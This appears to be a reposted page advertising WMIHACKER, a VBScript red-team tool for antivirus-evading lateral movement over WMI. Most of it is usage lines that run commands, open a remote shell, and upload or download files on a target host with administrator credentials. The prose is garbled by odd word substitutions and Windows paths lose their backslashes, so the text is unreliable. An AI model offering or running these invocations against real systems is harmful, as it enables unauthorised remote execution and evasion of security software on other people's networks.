WMIHACKER – A Bypass Anti-virus Software Lateral Movement Command Execution Tool
Disclaimer: The technologies involved in this task is only for protection learning and protection reasons, unlawful use is prohibited!
Bypass anti-virus computer software lateral movement command execution take a look at tool(No want 445 Port)
Introduction: The popular WMIEXEC, PSEXEC tool execution command is to build a support or simply call Get32_Procedure.build, these procedures have been intercepted by Anti-virus software 100%, so we created WMIHACKER (Bypass anti-virus program lateral movement command execution examination tool(No need 445 Port)).
Principal capabilities: 1. Command execution 2. File add 3. File obtain
How to use
C:UsersadministratorDesktop>cscript //nologo WMIHACKER_.6.vbs
__ ____ __ _____ _ _ _____ _ ________ _____
/ / / |_ _| | | | | / / ____| |/ / ____| __
/ / /| / | | | | |__| | / | | | ' /| |__ | |__) |
/ / / | |/| | | | | __ | / / | | | < | __| | _ /
/ / | | | |_| |_ | | | |/ ____ |____| . | |____| |
/ / |_| |_|_____| |_| |_/_/ ______|_|_______|_| _
v0.6beta By. Xiangshan@360RedTeam
Usage:
WMIHACKER.vbs /cmd host user pass command GETRES?
WMIHACKER.vbs /shell host user pass
WMIHACKER.vbs /upload host user pass localpath remotepath
WMIHACKER.vbs /download host user pass localpath remotepath
/cmd single command mode
host hostname or I P address
GETRES? Res Need Or Not, Use 1 Or 0
command the command to run on remote hostThe result is displayed after the command is executed> cscript WMIHACKER_.6.vbs /cmd 172.16.94.187 administrator "Password!" "systeminfo" 1
No benefits are shown after the command is executed> cscript WMIHACKER_.6.vbs /cmd 172.16.94.187 administrator "Password!" "systeminfo > c:1.txt"
shell mode> cscript WMIHACKER_.6.vbs /shell 172.16.94.187 administrator "Password!"
File add: duplicate the community calc.exe to the distant host c:calc.exe> cscript wmihacker_.4.vbe /upload 172.16.94.187 administrator "Password!" "c:windowssystem32calc.exe" "c:calc"
File download: Obtain the distant host calc.exe to the neighborhood c:calc.exe> cscript wmihacker_.4.vbe /download 172.16.94.187 administrator "Password!" "c:calc" "c:windowssystem32calc.exe"
